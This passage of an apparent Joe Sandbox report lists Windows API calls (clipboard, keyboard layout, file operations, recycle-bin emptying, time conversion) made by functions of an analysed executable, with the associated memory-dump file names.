      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
      • Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
      • Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
      • Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
      • Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
      • Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
      • Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043F400: GetFileAttributesA.KERNEL32(?), ref: 0043F425
      • Part of subcall function 0043F400: _strncpy.LIBCMT ref: 0043F4CE
      • Part of subcall function 0043F400: CreateDirectoryA.KERNEL32(?,00000000), ref: 0043F54C
      • Part of subcall function 0043F400: GetLastError.KERNEL32 ref: 0043F55B
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043CC30: GetKeyboardLayout.USER32(00000000), ref: 0043CC44
      • Part of subcall function 0043CC30: VkKeyScanExA.USER32(?,00000000), ref: 0043CC70
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043CE10: _strncpy.LIBCMT ref: 0043CE47
      • Part of subcall function 0043CE10: GetModuleHandleA.KERNEL32(kernel32,GetDiskFreeSpaceExA), ref: 0043CEA3
      • Part of subcall function 0043CE10: GetProcAddress.KERNEL32(00000000), ref: 0043CEAA
      • Part of subcall function 0043CE10: GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0043CF23
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00451760: LoadLibraryA.KERNEL32(shell32), ref: 00451766
      • Part of subcall function 00451760: GetProcAddress.KERNEL32(00000000,SHEmptyRecycleBinA,?,00426FAF), ref: 00451778
      • Part of subcall function 00451760: FreeLibrary.KERNEL32(00000000,?,00426FAF), ref: 00451797
      • Part of subcall function 00451760: FreeLibrary.KERNEL32(00000000,?,00000007,?,00426FAF), ref: 004517E0
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00451660: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451689
      • Part of subcall function 00451660: SHFileOperation.SHELL32(?), ref: 004516F7
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043F5C0: CreateFileA.KERNEL32(004987E9,80000000,00000003,00000000,00000003,08000000,00000000), ref: 0043F795
      • Part of subcall function 0043F5C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043F7A2
      • Part of subcall function 0043F5C0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043F7EF
      • Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F7FF
      • Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F85E
      • Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F8F9
      • Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F937
      • Part of subcall function 0043F5C0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0043F965
      • Part of subcall function 0043F5C0: GetLastError.KERNEL32 ref: 0043F971
      • Part of subcall function 0043F5C0: CloseHandle.KERNEL32(00000000), ref: 0043F981
      • Part of subcall function 0043F5C0: GetACP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00426F69), ref: 0043FA2C
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00432D80: GetKeyboardLayout.USER32(00000000), ref: 00432E2B
      • Part of subcall function 00432D80: _strncpy.LIBCMT ref: 00433022
      • Part of subcall function 00432D80: GetTickCount.KERNEL32 ref: 00433055
      • Part of subcall function 00432D80: CountClipboardFormats.USER32 ref: 00433254
      • Part of subcall function 00432D80: IsClipboardFormatAvailable.USER32(00000001), ref: 0043326F
      • Part of subcall function 00432D80: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043327B
      • Part of subcall function 00432D80: GetExitCodeProcess.KERNEL32(00000000,?), ref: 004332FA
      • Part of subcall function 00432D80: GetTickCount.KERNEL32 ref: 00433315
      • Part of subcall function 00432D80: CloseHandle.KERNEL32(00000000), ref: 004333A1
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 00431F1B
      • Part of subcall function 00431D40: GetKeyboardLayout.USER32(00000000), ref: 0043200C
      • Part of subcall function 00431D40: IsCharAlphaA.USER32(00000000), ref: 0043206A
      • Part of subcall function 00431D40: KillTimer.USER32(000601DA,0000000C), ref: 00432347
      • Part of subcall function 00431D40: GetQueueStatus.USER32(00000010), ref: 0043235A
